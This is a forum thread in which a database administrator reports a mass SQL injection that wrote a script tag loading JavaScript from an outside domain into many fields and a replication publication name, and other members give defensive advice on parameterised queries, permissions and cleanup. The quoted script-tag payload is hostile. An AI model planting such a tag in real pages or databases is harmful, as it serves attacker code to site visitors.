injection attack

  • Pleas help me!

    I'm under injection attack and i don't no what can i do.

    This script ' script src=http://www.hdadwcd.com/b.js /script' is injected to may database (sql server 2000).

    It not only injected in many of databases field but also renamed my publication name to :

    " publication name script src=http://www.hdadwcd.com/b.js /script "

    How can i repair it and stop this injection

    How can I edit binary fields in MSrepl_commands and delete this script from command field.

  • You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)

    There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly acces the tables but to use stored procs.

    I would suggest that you drop the publication in question and recreate it.

    Gail Shaw
    Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
    SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

    We walk in the dark places no others will enter
    We stand on the bridge and no one may pass
  • When reading this. Scroll up to the top of this page in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral

    If everything seems to be going well, you have obviously overlooked something.

    Ron

    Please help us, help you -before posting a question please read[/url]
    Before posting a performance problem please read[/url]

  • Hi

    Thank you for your last reply.

    I resolved that problem by editing all tables and removing that script.

    I think it was a new injection method.

    This link was helpful:

    http://www.msblog.org/index.php?s=yp

    http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

    But I couldn’t resolve a part of problem:

    There were many Binary fields in MSrepl_commands containing bad script.

    I deleted them because I couldn’t edit them.

    I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”

    Yours truly

    saeed.

  • The safest fix is probably to completely drop the replication and recreate it.

    Gail Shaw
    Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
    SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

    We walk in the dark places no others will enter
    We stand on the bridge and no one may pass
  • Wow, this is an old thread but still very pertinent.

    We are rapidly migrating to SQL 2005.

    But we were attacked by injection ... every vharchar field in every table replaced with similar .js crap. We restored and the world was good.

    But we're trying to find the vulnerability ... of the publically visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap.

    We are told that SQL2005 and SQL2008 handle SQL injections far better.

    We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

    I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware sotweare remedies.

    You refer to a profiler to see commands ... where is that?

  • Can you post this in a new thread please?

    Gail Shaw
    Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
    SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

    We walk in the dark places no others will enter
    We stand on the bridge and no one may pass
  • Sorry .. by all means .. I'm new here ... my bad.

    A new thread or somewhere you'd prefer?

    Robert

  • New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.

    Gail Shaw
    Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
    SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

    We walk in the dark places no others will enter
    We stand on the bridge and no one may pass
  • Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?

    We are trying to determine the vulnerability?

Viewing 10 posts - 1 through 9 (of 9 total)

You must be logged in to reply to this topic. Login to reply